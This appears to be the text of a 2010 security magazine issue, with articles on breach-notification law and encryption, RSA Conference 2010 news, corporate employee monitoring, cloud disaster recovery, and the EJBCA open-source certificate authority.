Data watchdogs are rapidly getting the bite to 
accompany their bark, with the ability to apply 
both hefty fines and notification costs. How- 
ever, the data breach legislations mentioned 
all have one key point in common. 

They all have 'safe harbor' provisions - ena- 
bling organizations to escape penalties if they 
can prove they took reasonable steps to pro- 
tect data, prior to the breach. For example, 
the EU Data Breach Notification provision, 
mentioned earlier, says that notification will be 
required "... except where the provider can 
demonstrate it has applied appropriate tech- 
nological protection measures which render 
the data unintelligible to unauthorized users." 

In simple terms, if an organization can show 
that it has encrypted its data (including the 
data lost in a breach) using a recognized, 
strong encryption process, in adherence to 
appropriate security policies, it can avoid 
penalties and notification costs. 

Of course, the benefits are not just financial. 
There's also the reduction in overall risk; in- 



creased goodwill from stakeholders; and an 
improved image and reputation for the organi- 
zation. Let's take a close look at how to de- 
ploy data encryption across an organization. 

Starting at the endpoint 

In terms of what solutions are needed, the 
fact that data breaches can now be punished 
by law makes any computing device a risk. 
Although the data breaches seen in media 
headlines are usually caused by the loss or 
theft of a laptop computer or USB memory 
stick, all computers within an organization - 
both desktops and laptops - are endpoints, 
with access to sensitive data. This means all 
computers should have data security controls 
installed. 

These controls should include full-disk en- 
cryption with pre-boot authentication, port/ 
device control software and removable media 
encryption. It's also important for the custom- 
ers' administrators - the people who are on- 
site everyday - to have central visibility and 
control over endpoints to ensure compliance 
with the organization's security policies. 
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To err is human, to secure divine 

The ability to centrally enforce security poli- 
cies with IT solutions is critical in data secu- 
rity. Over the past two years, many of the data 
breaches that hit the headlines were blamed 
on individuals who ignored security policies. 
But this way of thinking masks the real prob- 
lem. 

The vast majority of breaches happen not be- 
cause of malicious behavior, but because a 
well-meaning person was just trying to save a 
little time, or get their task done faster. In most 
cases, the person is aware of the organiza- 
tion's data security policy - but they thought it 
would be OK not to follow policy, just this one 
time. It's human nature. 



The solution is to automate the process so 
that security is applied automatically to the 
data in any circumstance - whether on shut- 
ting down a laptop, or copying data to a 
memory stick or CD. 

The security also needs to conform to policies 
determined by the IT department. This way, 
users cannot tamper with, or work around, the 
security. The less the user is aware of the so- 
lution - and latest generation products are 
highly transparent - the better. 

This combination of always-on, transparent 
security and easy, central management helps 
to eliminate a significant source of risk, while 
minimizing exposure to data breach disclo- 
sure laws and financial penalties. With the 
right data security approach, companies can 
keep the watchdogs at bay. 



Nick Lowe is head of sales for Western Europe for Check Point (www.checkpoint.com). 
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RSA Conference 2010 was held in March in San Francisco. The industry's 
most comprehensive forum in information security offerings enabled at- 
tendees to learn about the latest trends, technologies and new best practices, 
and also to gain insight into the different practical and pragmatic perspectives 
on the most critical technical and business issues facing you today. 

World-class technology leaders delivered keynotes this year and security pro- 
fessionals from all over the globe discussed important topics in order to help 
their peers with dealing with these issues on a daily basis. What follows are 
some of the many products and news presented at the show. 



Free service for malware detection on websites 



Qualys introduced QualysGuard Malware Detection, a free service that proactively 
scans web sites of any size, anywhere in the world, for malware infections and threats, 
and provides businesses with automated alerts and in-depth reporting for effective 
remediation of identified malware. (www.qualys.com) 



58 percent of software vulnerable to security breaches 

Veracode released a report detailing vulnerabilities found in software that large 
organizations rely on for business critical processes, which finds that more than 
half of the nearly 1 ,600 internally developed, open source, outsourced, and 
commercial applications analyzed when first submitted contained vulnerabilities 
similar to those exploited in the recent cyber attacks on Google, the U.S. 
Department of Defense, and others, (www.veracode.com) 
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Message and web cloud-based security services 



M86 Security announced its Secure Messaging Service, a cloud-based SaaS so- 
lution that incorporates features from Mail Marshal SMTP and includes capabili- 
ties such as Text Censor, the lexical analysis technology; behavior-based mal- 
ware detection for blocking the latest email blended threat attacks; anti-virus pro- 
tection; and SpamCensor. (www.m86security.com) 




Secure corporate desktop on USB stick 



Check Point announced Check Point Abra which turns any PC into a 
fully secure corporate desktop. The stick provides users access to 
company emails, files and applications anywhere through integrated 
VPN connectivity. It loads itself automatically and contains local en- 
crypted storage to protect any data on the device, (www.checkpoint.com) 
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Private and hybrid clouds quickly gaining ground 



-4 



IEEE and the Cloud Security Alliance announced results of a survey of IT profes- 
sionals that reveals overwhelming agreement on the importance and urgency of 
cloud computing security standards, (www.cloudsecurityalliance.org) 
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6 in 10 malicious URLs bypass AV scanners and URL filtering 



M86 Security released a new report that discloses both quantitative research 
on the percentage of web threats correctly identified by URL filtering (3%) and 
anti-virus scanning (39%) over the course of last month and three real-life stud- 
ies of specific attacks, which are increasing in frequency: dynamic obfuscated 
code, hacking of legitimate Websites, and zero-day vulnerabilities. 
(www.m86security.com) 




BLOCKMASTER 

Security Through Innovation 





Secure borderless networks architecture 



Cisco announced the Cisco Secure Borderless Network architecture, which 
evolves enterprise security by focusing on four critical anchors: enterprise end- 
points (mobile or fixed), the Internet edge, the data center, and policy that is con- 
text- and location-aware, (www.cisco.com) 



Millions lost due to illegal interception of cell phone calls 



According to a survey by the Ponemon Institute of seventy five companies and 107 
senior executives in the United States, it costs U.S. corporations on average $1 .3M 
each time a corporate secret is revealed to unauthorized parties. 18% of respondents 
estimate such losses to occur weekly or more frequently, 61% at least monthly and 
90% at least annually, (www.cellcrypt.com) 




Quarantine and taxation to stomp out malware? 

, Is the quarantine of infected computers and setting up an internet usage tax the way 

to go about defusing the malware threat? Scott Charney, Corporate VP for Trustwor- 
a "Jm thy Computing at Microsoft, seems to think so. In his keynote - comparing malware to 
r \l smoking - Charney said that when users accept malware, they are not only putting 
themselves at risk, but contaminating everyone around them, (www.microsoft.com) 
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SECURE 



Malware and vulnerability testing for business websites 

Qualys introduced Qualys GO SECURE - a new service that al- 
lows businesses of all sizes to test their web sites for the presence 
of malware, network and web application vulnerabilities, as well as 
SSL certificate validation. Once a web site passes the four com- 
prehensive security tests, the Qualys GO SECURE service gener- 
ates a Qualys SECURE seal for the merchant to display on their web site demonstrating to online 
customers that their company is maintaining a proactive security program. If malware or a vulner- 
ability that could lead to infection of online visitors or compromise of the web site is identified by 
the GO SECURE service, the merchant is immediately notified and the seal is subsequently re- 
moved. After the merchant removes the malware or remediates the vulnerability either by fixing or 
mitigating it, then the Qualys SECURE seal is re-instated automatically, (www.qualys.com) 
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Proactive forensic toolkit for threat-based policies 



Norman announced its Forensic Toolkit, which uses extensive analysis col- 
lected via Norman SandBox technology to determine policies that define "bad 
behavior." It identifies suspicious client behavior and decodes the threat before 
creating a policy based on the threat's behavior. The management console is 
used to distribute the policy across the network, clean infections and block fu- 
ture instances of the threat, (www.norman.com) 
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DHS casting its nets for cybersecurity experts 

Glancing about the room at the great number of RSA Conference attendees that 
came to hear her speak, Secretary of Homeland Security Janet Napolitano an- 
nounced the Department's great need of cybersecurity experts and informed 
them of its plan to seek those experts among the talent in the private sector. 
"This is a huge public interest for our country; we need the best brains to bring to 
bear on meeting the challenge," she said, (www.dhs.gov) 




Creating a new trust framework 



Google, PayPal, Equifax, VeriSign, Verizon, CA, and Booz Allen 
EXCHANGE Hamilton announced the formation of the Open Identity Exchange, a 

non-profit organization dedicated to building trust in the exchange of 
online identity credentials across public and private sectors. With initial grants from the OpenID 
(OIDF) and Information Card Foundation (ICF), OIX has been approved as a trust framework pro- 
vider by the United States Government to certify online identity management providers to U.S. 
federal standards for identity assurance, (www.openidentityexchange.org) 
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Video: Lessons learned from RSA Conferences 



Philippe Courtot, the Chairman and CEO of Qualys, offers insight into the past and 
present of the RSA Conference. He talks about how it has been growing and how it 
became the key information security event in the world. He mentions hot topics over 
the years and focuses on news from this year's edition of the event - especially on 
cloud computing, (www.net-security.org/article. php?id=1 402) 




Security pros doubt their network-based security 

Brocade's "man-on-the-street" survey at RSA Conference revealed that 
47% of respondents believe their network security solutions are less 
than 25% effective in thwarting security threats. Of those polled, nearly 
20% of those surveyed believe their company's security policies that 
deal with threats or data leaks are not being enforced effectively. 
(www.brocade.com) 
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Setting up a mobile botnet is alarmingly easy to do 



The relative easiness of setting up a mobile botnet of nearly 8,000 phones has 
been demonstrated by Derek Brown and Daniel Tijerina. The two researchers with 
built WeatherFist, a weather application for iPhones and Android smartphones, 
which is able to harvest information such as phone numbers and GPS coordinates 
from the phones of the people who downloaded it. (www.tippingpoint.com) 
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Working smarter has never been so important and 
security so crucial when it comes to safeguarding and 
growing your business. 

• Smart spending to justify and get value from budgets 

• Smart optimization of your technology, processes and resources 

• Smart people - education, training and awareness 
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Corporate monitoring: Addressing security, 
privacy, and temptation in the workplace 

by David Green 



Corporate monitoring has an ominous overtone for a lot of people. Employees 
often see the monitoring of their PC and Internet activity as a draconian inva- 
sion of privacy - that "Big Brother" is watching. Businesses, on the other 
hand, know that cyber-slacking, malware and data theft are just a few of the 
serious and costly issues that arise from employees' use of computer and 
Internet resources. 

Even a simple action like clicking on a link from a "friend" on Facebook or 
saving a confidential document to a thumb drive to work on at home, has the 
potential to cause tremendous harm and risk to a business. 



Spanish authorities recently shut down one of 
the world's largest networks of virus-infected 
computers, that was responsible for stealing 
credit card numbers and online banking cre- 
dentials from as many as 12.7 million PCs. 
The "Mariposa" virus was spread through 
instant-messaging malicious links to contacts 
on infected computers, and proliferated 
through thumb drives and peer-to-peer file 
sharing networks. News reports claim that 
more than half of the Fortune 1 ,000 compa- 
nies and more than 40 major banks were in- 
fected, even though they incorporate some of 
the most sophisticated IT security architec- 
tures. 



Mariposa reminded us that traditional wall- 
and-fortress security approaches can't stop an 
employee from innocently clicking on a link 
from a known contact, or inserting a thumb 
drive into their PC during a lunch break. 

Corporate monitoring, however, can serve as 
both a critical security tool and a built-in deter- 
rent to minimize employee misuse and abuse 
of computing resources. It also fills a void left 
unaddressed by firewalls, e-mail management 
systems, proxy servers and anti-spam or virus 
protection software - by vigilantly monitoring 
the human element and allowing businesses 
to use this information in strategic ways. 
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Is Big Brother really watching? 

Corporate monitoring isn't necessarily an 
"always-on" proposition. Companies often in- 
vest in monitoring when they suspect one or 
more employees are committing fraud or theft. 
What happens then depends upon the needs 
of the organization and beliefs of its manage- 
ment team. 

Some companies use monitoring to conduct 
random spot-checks for reassurance, or to in- 
vestigate a situation and gather necessary 
evidence when needed. After an incident oc- 
curs, forensic investigations can be time con- 
suming and costly. So some companies moni- 
tor around the clock, but only to capture and 



archive data for future use if absolutely 
needed - like a "black box" approach to 
quickly retrace user activity days or weeks af- 
ter someone clicked on a virus, lost an unre- 
coverable document, or engaged in some ille- 
gal or unethical activity. 

Some businesses monitor throughout the en- 
tire workday, and actively look for patterns and 
warning signs in an effort to curb Acceptable 
Use Policy violations, and to prevent employ- 
ees from getting carried away with excessive 
Internet use when a news story breaks or ma- 
jor sporting events take place. The balance of 
how much and how often to monitor is up to 
each business to strike, as well as deciding on 
the capabilities of the solution in which it in- 



For larger organizations with off-site workers, contractors, and employees who 
travel frequently, remote installation and centralized reporting and management 

may be essential. 



What does corporate monitoring entail? 

Basic solutions can involve monitoring and 
filtering web traffic to prevent users from ac- 
cessing specific websites, categories of web- 
sites, as well as proxy and peer-to-peer file 
sharing sites. More sophisticated monitoring 
and surveillance solutions delve deep into 
granular analysis of user activity - capturing 
login and logout events, keystrokes, accessed 
applications, use of removable devices, busy 
and idle time, and much more. 

The ability to capture screen snapshots can 
provide irrefutable evidence to prove or dis- 
prove sexual harassment allegations, or de- 
fend against wrongful termination suits. For 
larger organizations with off-site workers, con- 
tractors, and employees who travel frequently, 
remote installation and centralized reporting 
and management may be essential. Employ- 
ees with laptops may inappropriately surf after 
hours once they've logged off the corporate 
network and on to a less secure Internet con- 
nection. Therefore, if the business considers 
this to be unacceptable, it is important to 
choose a monitoring solution that will continu- 
ally record activity regardless of whether a 
corporate laptop is connected to the secure 
office network or the public Internet. 



Another important area to consider is whether 
to install monitoring software in stealth mode, 
or whether to allow employees to see that a 
monitoring product has been installed on their 
system. System Administrators can even con- 
sider creating custom pop-up messages that 
notify users of a monitoring policy during lo- 
gon or when they're being blocked from ac- 
cessing a website that is prohibited. 

Many businesses choose to install in "stealth 
mode" because an Acceptable Use Policy will 
indicate the possibility of monitoring, whereas 
full disclosure can lead a few black-sheep 
employees on an endless, time-wasting quest 
to defeat it. Some companies have a more 
positive experience by fully disclosing the 
software they use, because they find employ- 
ees to be more self-governing once they real- 
ize the scope of monitoring that is taking 
place. 

Initially, the choice of solution and degree of 
disclosure may be driven by the need to in- 
vestigate one or more users if the business 
suspects they've done something wrong. Be- 
yond that, factors like HR policy, budget, cor- 
porate culture, and security architecture can 
also impact the decision-making process. 
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Where does monitoring fit within the secu- 
rity architecture? 

Each security architecture is unique to the 
needs of a business as well as the environ- 
ment - i.e. is it a highly secured data envi- 
ronment like a hospital, government defense 
contractor, or a merger and acquisition advi- 
sory firm where regulatory compliance and 
data confidentiality are of the utmost impor- 
tance? A solid architecture also depends upon 
where the security needs to be. 

From a network perspective, it starts at the 
perimeter. Firewalls, proxy servers, e-mail 
management systems, intrusion detection, ac- 
cess management, and web filters provide a 
20,000-foot view of network security. They 
serve as gatekeepers to keep bad things out, 
monitor network traffic and data in motion, and 
can prevent certain transmissions from exiting 
the firewall, but assume trust for everyone 
within. Anti-spam and anti-virus protection 
systems can prevent malicious code from in- 
fecting corporate endpoints, and packet snif- 
fers can analyze traffic with more granularity 
even though it requires great skill and effort to 
do so. None of these, however, can tell you 
when a sales person saves a copy of the Top 
5,000 Customers Contact List to his thumb 
drive because he's contemplating a job 
change, as this action is within the gate and 
unavailable to the keeper. Businesses need to 
know if sensitive data is leaving the building 
electronically or on paper, whether employees 
are being productive or not during work hours, 
and be aware of what temporary help and 
contractors are doing on company computers 
at all times. 

Corporate monitoring addresses these issues 
and more, from both a network security and 
endpoint security standpoint, and is often a 
directive of HR or management rather than of 
the IT staff itself. As a basis for monitoring, 
companies must develop a solid Acceptable 
Use Policy to protect the business against 
theft, fraud, harassment, compliance viola- 
tions, and to maximize employee productivity. 

Is establishing an internal policy good 
enough? 

Policies and procedures exist even in the 
smallest organizations, but sometimes these 



guidelines are not very comprehensive. Nor 
are they effective unless they are enforced. 
Often overlooked is how employees should 
use PCs and the Internet during work hours, 
and what constitutes appropriate content on 
social networks used for business and per- 
sonal use. If employees are regularly posting 
to their personal Facebook or Twitter profiles 
after hours, their opinions and photos may be 
accessible to customers, partners and pros- 
pects, and can reflect poorly on the business' 
reputation. If employees are posting from work 
computers, this can cause productivity drains 
and have the potential to introduce socially 
engineered malware invasions on the corpo- 
rate network. 

An Acceptable Use Policy (AUP) is an agree- 
ment between employer and employee re- 
garding what will and will not be tolerated in 
the workplace where computer resources are 
concerned. Policies can be established to 
prohibit browsing through gambling, porno- 
graphic or sexually oriented websites at all 
times, but permit access to sports, news, on- 
line banking, and health insurance web sites 
during established lunch hours. 

In addition to requiring employees to sign an 
agreement binding them to an AUP, employ- 
ers should consider issuing regular written 
reminders, and conduct an annual review of 
its AUP to ensure it remains current with tech- 
nology advancements and applicable laws. 
Even with policies and procedures firmly in 
place, productivity and privacy issues may still 
cause concern. 

Security issues vs. privacy issues 

Studies show that email only makes up about 
15% of incoming malware - it's the other 85% 
that comes through the Internet that requires 
attention. In the third quarter of 2009 alone, 
online computer scams targeting small busi- 
nesses cost U.S. companies $25 million due 
to infiltrated malware. 

Even though the biggest security threats may 
come from cybercriminals on the outside, a 
new Deloitte report confirms that attacks by 
insiders are proving to be significantly more 
damaging and increasing in frequency. Survey 
data also suggests that as many as 41 % of 
U.S. workers have taken sensitive data to a 
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new position and 26% would pass on com- 
pany information if it proved useful in getting 
friends or family a job. Employers are within 
their legal rights to monitor electronic activity 
across corporate networks and computers 
provided they follow certain guidelines for dis- 
closure, but the legal dynamics surrounding 
this issue are constantly changing. Corporate 
lawyers argue that employers are entitled to 
"take ownership of the keystrokes that occur 
on work property" and judges typically view 
corporate computers and anything on them as 
company property. 

Even when employees know they're subject to 
monitoring, some can retain an "expectation of 
privacy" when accessing banking or health- 
care records, sending personal email, or shar- 
ing a recent event on Facebook or Twitter 
over corporate networks. Courts are starting 
to show more consideration for individuals 
who feel their employer has violated their pri- 
vacy electronically, or failed to inform them of 
policies and monitoring activities. 

In an effort to meet employees halfway, com- 
panies can select flexible monitoring solutions 
that can be configured not to capture personal 
logins and passwords for personal communi- 
cations, medical, and financial information; or, 
relax policies to allow some personal surfing 
during lunch hours. Unfortunately, the issue of 
security vs. privacy in the workplace has be- 
come extremely muddled with the explosion of 
social networking sites. 

The social networking conundrum 

We as human beings are not only private 
creatures, we're also social creatures. In a few 
short years, Facebook has skyrocketed to 
more than 350 million users. Research con- 
firms that nearly half of all online workers use 
Facebook at the office - and one in 33 has 
built their entire Facebook profile during work 
hours. Cybercriminals are keenly aware of this 
as well, and have been stepping up efforts to 
generate more socially engineered attacks 
that prey on people's familiarity and trust in 
one another within social networks. 



Add-ons like the newly announced "Social 
Connectors" for Microsoft Outlook further 
muddy the waters by bringing social network- 
ing information directly into corporate email. 
Until now, IT departments could restrict or 
block sites like Facebook and MySpace with 
the click of a button. Soon, as these new so- 
cial connectors start to proliferate, IT will have 
little insight or ability to prevent employees 
from goofing off while appearing to be produc- 
tive in Outlook. Once again, this is where cor- 
porate monitoring fits into the security equa- 
tion. It allows companies to watch human be- 
havior to see whether an employee is actually 
working or is violating policy. It's especially 
helpful from a post-mortem sense when inap- 
propriate activity is suspected. No more tedi- 
ous days tracing through log files, browser 
histories or email backups. As long as the 
monitoring solution has been continually re- 
cording and archiving activity, IT can quickly 
recall and review reports and screen snap- 
shots for precise insight into an employee's 
actions and intent, long after something may 
have occurred. 

Monitoring the human element of security 

It seems to be human nature for some work- 
ers to try and beat the system. Even when an 
employee appears to be getting the job done, 
evidence shows that they don't seem to mind 
using a work computer for personal use. In 
extreme cases, companies can be put into se- 
rious financial, legal and compliance risk from 
employee misuse of PC and Internet re- 
sources. 

Once you've decided to implement corporate 
monitoring, it is important to choose a product 
that is appropriate for the environment and 
employees you intend to monitor, with the fea- 
tures and functions you want to take advan- 
tage of while monitoring. With a little bit of re- 
search and planning, you can address produc- 
tivity, ethics, security, and compliance con- 
cerns head-on by establishing policies and 
enforcing them with corporate monitoring. In 
addition to filling the missing gap in your secu- 
rity architecture, you'll also start saving money 
as ongoing casual cyber-slacking virtually 
grinds to a halt. 



David Green is Vice President of Customer Services at SpectorSoft (www.Spector360.com), a maker of PC 
and Internet monitoring and surveillance software. 
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• Cross site scripting 

• Google hacking 
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Cloud computing is one of the biggest marketing terms for 2010. The IT indus- 
try sees the potential to architect IT solutions in new ways and make IT proc- 
esses simpler. For customers, the sheer amount of discussion around cloud 
makes it difficult to see the forest for the trees. What does the cloud really of- 
fer to businesses looking at improving how they recover from disasters, from 
a small issue like a lost file through to a significant event such as fire, flood or 
loss of power? 



What should we be protecting? 

When thinking about business continuity and 
recovery, the most important questions to ask 
are those regarding the amount of time that 
an organization can function before an issue 
will affect productivity and/or revenue genera- 
tion. For different organizations across various 
markets, this time can be shorter or longer. 
The application service that is important to the 
organization will also vary. However, the 
whole aim for a business continuity program 
should be to protect these critical systems 
against the risk of failure. 

When planning this protection, you should 
think about the whole service being delivered, 
and what is necessary for delivering that serv- 
ice to the business. From the physical or vir- 



tual server that an application resides on, to 
the operating system that an application is in- 
stalled on and the data that the application 
creates and works ith, this service should be 
considered in its entirety. 

The first point to make clear is what makes up 
a workload from a business IT perspective. A 
workload is the full application or service that 
a business has in place, including the applica- 
tion, operating system, settings and data. Re- 
covery of workloads is a much harder task 
than just backing up data. 

All of these pieces go into making up the full 
service, and from a backup perspective, they 
should all be protected to make recovery eas- 
ier. 
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There are already a number of online backup 
and cloud storage providers on the market. In 
most cases, the service here is based on get- 
ting copies of a company's files up to the 
cloud so that they are protected against fail- 
ure. However, these services concentrate on 
the data side of the equation, rather than the 
full service. 

An important difference as far as backup and 
recovery into the cloud is concerned is how 
the data is replicated. Most online backup 
providers base their services on scheduled 
replication, i.e. any changes made to the data 
are stored up to a set point, and then sent 



over to the cloud. However, when you are 
working with full workload images for recovery 
purposes, this can lead to a significant 
amount of data being lost. For example, if a 
system is backed up, and then a large patch 
is put in place, rolling back to the previous 
version would potentially be difficult and time- 
consuming, on top of the loss of data that 
would also be felt. 

Replicating information and data changes in 
real time with a cloud recovery service en- 
sures that this problem is not encountered, 
and that the workload image that is being pro- 
tected is as up to date as possible. 



APPLYING A CLOUD RECOVERY APPROACH INTO AN OVERALL BUSINESS 
CONTINUITY STRATEGY WILL DEPEND ON THE SIZE OF THE ORGANIZATION, 

AND THE INDUSTRY THAT IT WORKS IN 



Cloud computing: the sky's the limit? 

Another point to consider is how cloud com- 
puting changes the overall process of disaster 
recovery and backup, because it can allow 
organizations to combine storage with com- 
pute power. A true cloud recovery strategy dif- 
fers from pure online backup as it is not just 
about saving files for later. Instead, a cloud 
recovery product should give an organization 
greater flexibility as they can spin up the 
whole system being protected within the cloud 
itself. 

The cloud's ability to offer almost limitless re- 
sources on someone else's data centre 
means that storage is the first opportunity. In- 
stead of buying in more capacity and then 
paying to manage it, why not pay a smaller 
fee for someone else to do that for you? With 
no upfront cost, and a low monthly fee ac- 
cording to the level of storage being used, this 
can be a very attractive offer for businesses. 
However, the cloud offers more than this: it 
can provide computing resources as well, 
ands the storage that an organization buys in 
can also be put to work. 

For disaster recovery and business continuity 
purposes, this involves using the backup data 
that is put into the cloud in a new way. If a 
disaster event affects the organization, then 



the IT manager can simply take the backup of 
the workload and run it within the cloud while 
the issue is being worked on. For the organi- 
zation involved, this gets the business back 
up and running far faster, and gives them time 
to work on fixing the problem at the produc- 
tion site. 

This also speeds up the time of recovery 
when compared to approaches based solely 
on online backup or cloud storage. With these 
systems, the process of recovery still relies on 
getting the most up-to-date backups back to 
site and using these to rebuild the system. 
This adds up to hours, during which the busi- 
ness might not be operational, leading to lost 
revenue. If a company can use its full backup 
images to create workloads in the cloud, then 
this window can be dramatically reduced. It 
also aids the recovery process: once the pro- 
duction site is back online, the tailback proce- 
dure just involves getting the primary site 
servers up to speed with any changes, rather 
than completely rebuilding server instances. 

Applying a cloud recovery approach into an 
overall business continuity strategy will de- 
pend on the size of the organization, and the 
industry that it works in. Some companies, 
such as those in financial services, have strict 
rules in place regarding client information and 
data protection. 
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IF A FAILURE OCCURS, USERS CAN BE REDIRECTED TO A LIVE SESSION 
RUNNING IN THE CLOUD WITH THE MOST UP-TO-DATE DATA SETS 



For these businesses, being aware of how the 
cloud provider that they are evaluating man- 
ages its security is a crucial part of their 
decision-making process, as well as under- 
standing what happens to their data once it is 
handed over. 

Whom is cloud recovery suitable for? 

Depending on the size of the customer, cloud 
recovery is suitable for: 

• Smaller organizations that don't have the 
funds or expertise available to support a 
proper disaster recovery strategy 

• Larger organizations that don't have a sec- 
ond data centre - according to Gartner, 75 per 
cent of businesses with under 1000 employ- 
ees fall into this category 

• Enterprise organizations, where there are 
still a lot of 'third tier' applications that are not 
protected at all, or that are backed up on tape. 

The cloud's main selling point is that costs 
can be reduced, particularly as it is based on 
a "pay as you go" model. If you either don't 
use a service, or are only using a service at a 
maintenance level, then the costs will be 
lower. This variability of cost can be a chal- 
lenge for organizations that are used to man- 
aging fixed costs around business continuity, 



but for those that previously have not had any 
program in place, it should be less of an is- 
sue. 

For larger organizations, one of the biggest 
decisions to make is how cloud recovery can 
play a role alongside more traditional ap- 
proaches to backup, such as tape or disk- 
based replication technologies. In these 
cases, the strategy should be based on how 
best to achieve the business' recovery point 
objective and recovery time objectives (RPO 
and RTO respectively), alongside what exist- 
ing investments have been made. 

For organizations that want a short RPO and 
RTO, using the cloud can have a real impact 
alongside a high availability strategy. Using 
approaches such as clustering or replication 
of system state data to a second server can 
ensure that single-instance disasters such as 
a server failure do not affect the business in 
its day-to-day activities; the cloud recovery 
option is there to provide a natural next step 
in the event of a more serious issue. 

If a failure occurs, users can be redirected to 
a live session running in the cloud with the 
most up-to-date data sets possible. 



FOR LARGER ORGANIZATIONS, ONE OF THE BIGGEST DECISIONS TO MAKE 
IS HOW CLOUD RECOVERY CAN PLAY A ROLE ALONGSIDE MORE 
TRADITIONAL APPROACHES TO BACKUP, SUCH AS TAPE OR 
DISK-BASED REPLICATION TECHNOLOGIES 



Other applications for cloud recovery 

Many organizations today have multiple 
branch offices or remote sites to consider as 
part of their continuity strategy. These envi- 
ronments will tend to be much smaller than 
the head office, and one of the main issues 
here is the lack of local IT support. 

Typically any backup process for local data 
will be based on tape copies, often performed 
by unskilled staff. This can lead to potential 



problems with backups not being carried out 
successfully, leading to lost information. 

There are two approaches to this problem: 
one is to centralize the data backup strategy 
over the company's Wide Area Network and 
replicate information back to the head office 
data centre. This has the benefit of allowing 
the backup process to be overseen by trained 
staff, raising the likelihood of systems being 
protected correctly. 
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THE WHOLE SELLING POINT FOR CLOUD COMPUTING IS THAT IT MAKES IT 

PROCESSES MORE STREAMLINED 



Any implementation of this kind should be op- 
timized to run over a WAN, so that it does not 
have too much of an impact on day-to-day ac- 
tivities. It also means that the right data ar- 
chiving and preservation techniques can be 
applied. 

The second approach is to use the cloud: 
central IT can set up the service so that server 
workloads are automatically backed up into 
the cloud in the same way as they would be 
carried out with the central backup approach. 
The operation can still be managed from the 
company's head office, and in the event of a 
failure at the branch office workers can be 
pointed at the workloads that are running in 
the cloud. 

While the organization can potentially achieve 
lower costs than with the on-site centralized 
backup strategy, as it will require less storage, 
it may not be as easy to carry out other IT 
activities such as archiving. 



Cloud is not a panacea, but a real option 

One major challenge for organizations looking 
at their backup strategy is ensuring that the 
technology they choose actually supports the 
applications that are in place at the business. 
The applications that are the most common 
culprits for this are databases and email serv- 
ices, where the file system type employed 
makes standard backup harder to achieve 
successfully. 

From the cloud perspective, taking the whole 
system and replicating IT over solves this par- 
ticular problem - instead of having to support 
each and every esoteric application by itself, 
any application that runs on the operating sys- 
tem can automatically be protected. 

When the workload is required, it will boot up - 
as it normally would - on a standard physical 
or virtual server, and run as required. For or- 
ganizations without the skills to manage a full 
backup and recovery procedure, this ap- 
proach makes the whole process much more 
simple. 



WHILE THE ORGANIZATION CAN POTENTIALLY ACHIEVE LOWER COSTS THAN 
WITH THE ON-SITE CENTRALIZED BACKUP STRATEGY, AS IT WILL REQUIRE 
LESS STORAGE, IT MAY NOT BE AS EASY TO CARRY OUT OTHER IT ACTIVI- 
TIES SUCH AS ARCHIVING 



The whole selling point for cloud computing is 
that it makes IT processes more streamlined: 
instead of requiring in-house expertise and 
devices, these can be sourced from other 
providers, reducing the cost involved and put- 
ting the emphasis back on the results that can 
be delivered from IT. This strategy means that 
cloud computing and recovery becomes a 
part of the overall strategic mix for IT. 

Where cloud recovery can develop further is 
to address the challenges that organizations 



have mentioned around their general re- 
sponse to cloud, such as the security of data 
and the needs for compliance around particu- 
lar information. Cloud recovery can also fit 
alongside existing recovery technologies and 
strategies where it makes the most sense for 
the business. When cloud providers evolve 
their offerings to meet these requirements and 
not just reduce cost, then the issue becomes 
less around building trust around cloud and 
more on what benefit this kind of service can 
deliver. 



Ian Masters is the UK Sales Director for Double-Take Software (www.doubletake.com). 
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Verifiable digital certificates are a well established technology, popular in 
business and academic environments. Based on the concept of public key 
cryptography, it uses a hierarchical, tree structure of Certificates Authorities 
(CAs) and Registration Authorities (RAs) to prove certificate validity for end 
users. When there is a need to set up such structure, many solutions can be 
used. One of them is the free and open source Enterprise Java Beans 
Certificate Authority (EJBCA). Why is it worth to take a look at? 



Before we dive into EJBCA features, we need 
to understand some basic concepts of the 
verifiable digital technology core - Public Key 
Infrastructure (PKI). The following three enti- 
ties make PKI: CAs, RAs and End-entities. 

A CA issues certificates to and vouches for 
the authenticity of entities. It does so by digi- 
tally signing end-entities certificates with its 
CA signature. There is one particular CA in 
the PKI tree - the RootCA, which has a self- 
signed certificate (it vouches for itself). 

The RootCA is also called Trusted Root, and 
has to be configured somehow as trusted root 
with all clients in the PKI. This is usually done 
by adding its certificate to a list of trusted 
CAs. As well as RootCA, on the other side, 
there are SubCAs. SubCA is a CA which 



authenticity is vouched by other CA, and does 
not have to be configured as trusted root. 

RA is an administrative function that registers 
entities in the PKI. The RA identifies and 
authenticates entities which apply for a certifi- 
cate. There can be one or more RAs con- 
nected to each CA in the PKI. 

An end-entity is a user that uses digital certifi- 
cate. To make it clear, it does not have to be 
human. Some examples of an end-entities are 
employees, e-mail clients and web servers. 

EJBCA specific concepts 

Apart from the above basic concepts, to ex- 
tend its flexibility, EJBCA introduces a few 
specific ones. This includes: Certificate Pro- 
file, End Entity Profile and Publisher. 
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A certificate profile determines a set of attrib- 
utes of issued certificates. Some examples of 
such attributes could be validation period or 
permitted usage. The certificate profile also 
determines if a certificate will be published 
and with which publisher. 

An end-entity profile determines what proper- 
ties users (end-entities) can or must have. 
Some values can be predefined. A good ex- 
amples of user properties are the organization 
and e-mail address. 

A publisher stores issued certificates to a cen- 
tral location, usually publicly available. 

Features 

EJBCA is OSI Certified Open Source Soft- 
ware. Support for the most popular standards 
and protocols is available. Also strong encryp- 
tion algorithms and hash functions can be 
used. 

EJBCA can produce X.509 certificates in 
PKCS12, JKS and PEM formats. Also Card 
Verifiable Certificates (CVC), smart card logon 
certificates and Qualified Certificate State- 
ment (RFC3739) for issuing EU/ETSI qualified 
certificates are supported. 

Protocols such as Simple Certificate Enroll- 
ment Protocol (SCEP) and Online Certificate 
Status Protocol (OCSP) are implemented. 

RSA (with 4096 bits long key), DSA (with 
1024 bits long key) and ECDSA algorithms 
along with hash functions such as SHA-1 and 
SHA-256 can be used. 

Apart from that, EJBCA can be run using mul- 
tiple application servers and databases. Pos- 
sible application servers include JBoss, We- 
blogic, Glassfish, QC4J and Websphere. Pos- 
sible databases include Hypersoniq, MySQL, 
PostgreSQL, Oracle and DB2. 

Interfaces 

For typical usage, EJBCA includes two inter- 
faces: web Graphic User Interface (GUI) and 
Command Line Interface (CLI). 

The web GUI is divided into two parts: publicly 
available and private (available only through 



SSL connection). The publicly available part 
of the interface serves end-entities. Certifi- 
cates can be requested and downloaded 
here. The private part serves for administra- 
tion purposes, such as adding users or ap- 
proving actions. 

